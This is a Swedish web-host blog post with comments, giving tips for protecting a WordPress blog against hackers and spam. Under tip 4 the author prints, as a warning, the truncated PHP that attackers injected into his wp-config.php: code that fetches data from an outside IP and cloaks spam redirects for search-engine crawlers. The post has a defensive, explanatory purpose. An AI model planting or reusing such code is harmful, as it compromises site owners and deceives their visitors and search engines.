Simons SEO-tips: WordPress sökguide del 5 – Så skyddar du din blogg mot hackare och spam

  • PUSHA

Häromdagen blev min engelska WordPress-blogg hackad. Det skapades en mängd undersidor och mina vanliga inlägg redirectades till direkta Spam-sidor. Eftersom jag inte uppdaterat bloggen på länge upptäckte jag inte när det hände – men resultatet lät inte vänta på sig: Min blogg blev bortplockad från Googles index!

Även om mycket är perfekt med WordPress ser vi nu att många hackare tagit sig in på SEO-spåret. De vill utan din vetskap hacka sig in på din blogg och på så sätt förstöra allt det jobb du lagt ner.

Så när vi pratar SEO nu så handlar det i hög utsträckning om att skydda sig mot dessa hackare. Givetvis borde jag ha haft mycket bättre koll på min blogg så den inte blev hackad – jag var slarvig. Men man lär sig av sina misstag – så därför handlar min femte del i WordPress SEO-guiden hos Binero just om att skydda sig, så ni inte råkar ut för det jag gjorde.

Tidigare: 1) SEO från början, 2) Tekniska tips, 3) Gratisverktyg 1, 4) Gratisverktyg 2, 5) Skriva för Google, 6) Länkbete, 7) WordPress 1, 8 ) WordPress 2, 9) WordPress 3, 10) WordPress 4

Så skyddar du din blogg mot hackare och spammare

1. Välj bra lösenord.

Ett bra tips är att använda sig av olika lösenord på ditt Binero-konto på din blogg. En bra regel är att ha tre olika användarnamn och lösenord:

  1. Unikt användarnamn och lösenord för inläggning på webbhotellet
  2. Unikt användarnamn och lösenord för inlogg på /wp-admin/
  3. Unikt användarnamn och lösenord för din WordPress-databas.

Hackare har nämligen en tendens att ta sig in lite överallt och får de tillgång till ditt Binero-konto kan de snabbt smyga in och ändra i dina databaser och FTP.

Hackare har förfinat det här vilket gör att de på vissa amerikanske webhosting-firmor automatiserat allt det här via script. Det räcker således att de har tillgång till ditt login och lösenord på ditt webbhotell för att de ska ställa till med stor skada.

Vi ser det inte än i Sverige, men med tanke på hur duktiga de har blivit kan det mycket väl hända här i Sverige. Så se till att ha bra lösenord (med siffror och unika tecken som ?!&)

2. Installera WP-DBManager

Se till att installera WP DB Manager som optimerar och regelbundet gör backup på din databas. Du kan välja hur ofta du vill att de ska göra backup på din databas.

 

 

 

 

 

 

 

 

 

 


Du kan manuellt plocka ned hela databasen via pluginet men även välja att få det skickat till dig. Som standard rekommenderar jag att du kör en veckovis backup, men uppdaterar du din blogg väldigt ofta kan det även vara läge med en daglig backup.

3. Se över skrivrättigheterna på din FTP

Se till att inte ha allt för vänliga skrivrättigheter på din FTP. Några saker som är bra med WordPress är att det tillåter att vissa filer är skrivbara.

Som regel bör du se till att skydda viktiga filer i roten samt /wp-admin/ och /wp-includes/ från att vara skrivbara.

4. Håll koll på följande filer extra mycket

wp-config.php

Det var här som hackarna smög in följande kod på min engelska blogg:

error_reporting(0);$sd=””;$pts=explode(“?”,$_SERVER['REQUEST_URI']);$pt=$pts[0];$d1=”212.117.169.139″;$f1=”/allmykey4.txt”;$fp1=fsockopen($d1,80,$erno,$erstr,30);if(!$fp1){print “Err: $erstr [$erno]“;}else{fwrite($fp1,”GET $f1 HTTP/1.0\r\n”);fwrite($fp1,”Host: $d1\r\n\r\n”);while(!feof($fp1)){$h1.=fread($fp1,512);}fclose($fp1);}preg_match_all(“!([^<]+)!”,$h1,$m1);$rkk=$m1[1][rand(0,count($m1[0])-1)];$rk=explode(“@”,$rkk);$rd=$rk[0];$rp=$rk[1];$a=$_SERVER['HTTP_USER_AGENT'];$ra=$_SERVER['HTTP_REFERER'];if(eregi(“google”,$a)||eregi(“Googlebot”,$a)||eregi(“slurp”,$a)||eregi(“msnbot”,$a)||eregi(“google.”,$ra)||eregi(“yahoo.”,$ra)||eregi(“live.”,$ra)||eregi(“msn.”,$ra)||eregi(“bing.”,$ra)){$d4=$rd;if(!eregi(“/news”,$pt)){$f4=”/news”.$pt;$f4=str_replace($sd,””,$f4);}else{$f4=str_replace($sd,””,$pt);}$fp4=fsockopen($d4,80,$erno,$erstr,30);if(!$fp4){print “Err: $erstr [$erno]“;}else{fwrite($fp4,”GET $f4 HTTP/1.0\r\n”);fwrite($fp4,”Host: $d4\r\n\r\n”);while(!feof($fp4)){$h4.=fread($fp4,512);}fclose($fp4);}$bo=””;$h4=str_replace(”,$bo,$h4);if(eregi(“<h1>Page not found, 404 error</h1>”,$h4)){$ru=”/”.$sd.$rp;header(“HTTP/1.1 301″);header(“Location: $ru”);exit();}else{$x4=explode(“\r\n”,$h4);for($m=9;$m

 

Lurigt som tusan så håll koll på din wp.config-fil!

.htaccess
Här sker all redirects för din blogg vilket gör att en smart person kan smyga in kod där vilket inte alltid är trevligt. Varenda gång du uppdaterar din blogg via FTP håll koll på när den här filen senast uppdaterades.

5. Ställ in din robots.txt för att förhindra robotar

Genom att ställa in i din robots.txt kan göra så att robotar och spindlar förhindras att komma åt vissa delar av din sajt. Robots.txt bör ligga in roten av din HTML och ett förslag är att den ser ut så här:

User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-content/
Disallow: /wp-admin/
Disallow: /wp-includes/

6. Uppdatera alltid WordPress

Hackare är duktiga på att utnyttja säkerhetshål och jag är övertygad om att de kommer hitta hål i nuvarande WP-versioner.

Kolla upp vilken version av WordPress du sitter på och se alltid till att uppgradera till nya stabila versioner. Kan låta väldigt enkelt och självklart men har du många sajter är det ofta att man glömmer av det – så även för mig.

7. Använd AskApache Password Plugin

AskApache Password plugin gör ingenting direkt med WordPress, istället skapar det multipla lager av säkerhet för din sajt eller blogg.

I princip skapar den virtuell vägg runt din blogg som stoppar attacker innan  ens når din blogg. Dessutom blockerar den en hel del spam från att komma fram till din blogg vilket gör att du sparare minne, CPU och mycket mer.

Det finns en stor mängd konfigurationsmöjligheter du kan göra med detta pluggen – har du frågor kring detta så ställ det i kommentarerna nedan.

8. Använd Secure WordPress plugin

Secure WordPress plugin gör flera saker som exempelvis:

  1. removes error-information on login-page
  2. adds index.php plugin-directory (virtual)
  3. removes the wp-version, except in admin-area
  4. removes Really Simple Discovery
  5. removes Windows Live Writer
  6. remove core update information for non-admins
  7. remove plugin-update information for non-admins
  8. remove theme-update informationfor non-admins (only WP 2.8 and higher)
  9. hide wp-version in backend-dashboard for non-admins
  10. remove version on urls from scripts and stylesheets onyl on frontend
  11. Block bad queries

Som du kan se under punkt 3 så förhindrar den att visa vilken WordPress-version du sitter på. Vissa versioner av WordPress är mindre säkra än andra och att öppet berätta vilken version du sitter på gör det lättare för hackade att just utnyttja detta.

9. Min sajt är borta från Googles index eftersom den blivit hackad. Hur gör jag?

Det bästa sättet när du vet att din blogg blivit hackad är att plocka den offline innan du vet vad som har hänt. När allt är fixat (Ja, allt!) kan du begära det som kallas “Request  reconsideration” via Google Webmaster Tools.

Du behöver inte vara orolig – Google är väldigt snabba på att se till att din blogg återigen blir synlig.

 

 

 

 

 

 

 

 

 

 


Jag kommer personligen implementera samtliga följande åtgärder för mina bloggar framöver. Förhoppningsvis gör det mitt och även ditt bloggande lite mer säkert och vi slipper båda lägga timmar på att felsöka vad som har hänt.

Finns det någon viktig säkerhetsåtgärd jag missat? Tipsa gärna härnedan!

  • Pingback: Tweets that mention Simons SEO-tips: WordPress sökguide del 5 – Så skyddar du din blogg mot hackare och spam | Binero - bäst på domännamn, vänligast på webbhotell -- Topsy.com

  • http://www.internetsweden.se/ Internet Sweden

    Ang. 1.
    Jag önskar att jag kunde hålla med, men tråkigt nog ser “vi” en ökande trend här.
    Om än inte jättevanligt så har det kommit till vår kännedom om “ett antal” hackade och för otyg, utnyttjade wp-installationer.
    Förutom Simons lösenordsförslag, så rekommenderar jag följande WP-plugin: “SI CAPTCHA Anti-Spam” som försvårar “brute force-attack” till admin-login

    Kan installeras direkt från WP eller läsas om och laddas ner här: http://www.642weather.com/weather/scripts-wordpress-captcha.php
    Läs mer om Bruteforce-attacker
    http://sv.wikipedia.org/wiki/Brute_force

    Peter Forsman/internetsweden.se
    (även Abuseansvarig för .se-zonen)

  • http://twitter.com/ordbajsarn Stefan Bergfeldt

    Tack för trevliga säkerhetstips!

  • http://nabillionaire.se Nabil El Alaoui Sossey

    Nämnvärt är att alla dina hackade undersidor går att hitta i Google efter en site:dinurl.com-sökning. Bara att titta i cachen. För folk som är nyfikna likt mig, alltså :)

  • http://twitter.com/mikaeluusitalo Mikael Uusitalo

    Jag vill rekommendera WordPress Firewall från SeoEgghead. Bra verktyg för ett generellt skydd mot olika typer av injections, ex. om du har många formulär på din sida.

    -> http://www.seoegghead.com/software/wordpress-firewall.seo

  • http://www.linnarsson.com/ Johan Linnarsson

    Hej Simon!

    Angående robots.txt. Om man väljer att ha med “/wp-content/” så antar jag att detta inte påverkar sökresultatet för exempelvis Google? Dvs. man kan säkert ha med alla kataloger?

    Tack på förhand

    Med vänlig hälsning
    Johan Linnarsson

  • http://twitter.com/sadsmile Anders Ringman

    Jag får en massa felmeddelande när jag testar WP-DbManager:

    Checking MYSQL Dump Path …
    MYSQL dump path does NOT exist. Please check your mysqldump path under DB Options. If uncertain, contact your server administrator.

    Checking MYSQL Path …
    MYSQL path does NOT exist. Please check your mysql path under DB Options. If uncertain, contact your server administrator.

    Checking PHP Functions (passthru(), system() and exec()) …
    passthru() disabled.
    system() disabled.
    exec() disabled.

    I’m sorry, your server administrator has disabled passthru(), system() and exec(), thus you cannot use this backup script. You may consider using the default WordPress database backup script instead.

    Plus att det står att .htaccess/ filen skall flyttas till en annan folder.

    Skulle inte du Simon, eller någon från Binero, kunna göra ett inlägg om hur man ställer in pluginet så att det funkar perfekt hos Binero. Att köra en backup av sin blogg med jämna mellanrum är ju viktigt.

  • Anonym

    Jag får en massa felmeddelande när jag kör WP-DBManager:

    Checking MYSQL Dump Path …
    MYSQL dump path does NOT exist. Please check your mysqldump path under DB Options. If uncertain, contact your server administrator.

    Checking MYSQL Path …
    MYSQL path does NOT exist. Please check your mysql path under DB Options. If uncertain, contact your server administrator.

    Checking PHP Functions (passthru(), system() and exec()) …
    passthru() disabled.
    system() disabled.
    exec() disabled.

    I’m sorry, your server administrator has disabled passthru(), system() and exec(), thus you cannot use this backup script. You may consider using the default WordPress database backup script instead.

    Dessutom så står det att jag skall flytta min .htaccess-fil till en annan folder.

    Skulle inte du Simon, eller någon från Binero, kunna skriva en liten instruktion om hur man ställer in detta plugin så att det fungerar perfekt hos Binero.

    Gärna också lite instruktioner om AskApache Password pluginet.

    //Anders

  • David

    Hej Simon,
    Fick samma problem som tidigare skribent ang inställnignarna i det script du rekomenderade. Gör gärna en “how to” om du och binero fortfarande rekomenderar scriptet.
    mvh
    Follower ;-)

  • tips

    tja, mindre fel precis ovanför punkt 3
    “daglig bakut.” backup ska det såklart vara…
    mvh
    D

  • Anonym

    Hej tips!
    Man tackar! Fixat!
    Vänliga hälsningar,
    Erik
    Binero

  • Niklas

    Jag som de andra blev inspirerad av backup pluginet. Men som de andra får jag det inte att fungera. Lite smått tråkigt när det verkar vara en bra plugin..

  • http://www.joinsimon.se/ Simon Sundén

    Ja, några få är fortfarande indexerade för den som är intresserad. Kommer även skriva mer om det i detalj framöver med skärmdumpar och exakt hur de gick tillväga och hur resultatet av hackningen såg ut.

  • http://www.joinsimon.se/ Simon Sundén

    I några fall finns det sajter som har innehåll i WP-content i form av PDFs dokument och andra delar som man vill ha indexerade och då kan det vara en poäng att inte ta med just wp-content i robots.txt.

    Men har du det någon annan stans – sätt in /wp-content/ i robots.txt – nemas problemas.

  • http://www.joinsimon.se/ Simon Sundén

    Bra synpunkt! Jag ser till att återkomma med det!

  • http://www.joinsimon.se/ Simon Sundén

    Stort tack för tipset Peter!

  • http://www.bjornsennbrink.se Björn Sennbrink

    Ett alternativ till punkt 2 är att köpa tjänsten http://vaultpress.com/

  • http://www.tomatsallad.nu Chefstomaten

    Halloj,

    Tråkigt att du blev hackad men viktigt inlägg. som resultat Jag installerade raskt hela klabbet. Gissar att någon av dem är ansvarig för att jag nu inte kan uppdatera olika plug-in automatiskt (vilket är enda sättet jag vet att uppdatera dem på)…

    Vet du vilket av punkterna det är som skyddar mig så extra bra? Så kan jag ta bort…. Känns som microsoft-säkerhet (deras sk ex-vad-det-nu-heter-skydd som gör att man inte kan ladda upp bilder på bloggen från IE).

  • http://www.tomatsallad.nu Chefstomaten

    Utfärdar en liten varning för något av tipsen ovan (vet ej vilket då jag glatt införde allihop). Det går sedan inte att automatiskt uppgradera, exempelvis när det som idag dyker upp en ny wordpressversion.

  • Pingback: Hatar alla sabla så kallade skydd just nu! - Tomatsallad

  • Pingback: Svar på era frågor om SEO - del 1 | Binero blogg


Bäst i test två år i rad - Internetworld

Rekommenderas av InternetworldVi är prisade för vår goda support, höga funktionalitet och kontrollpanel.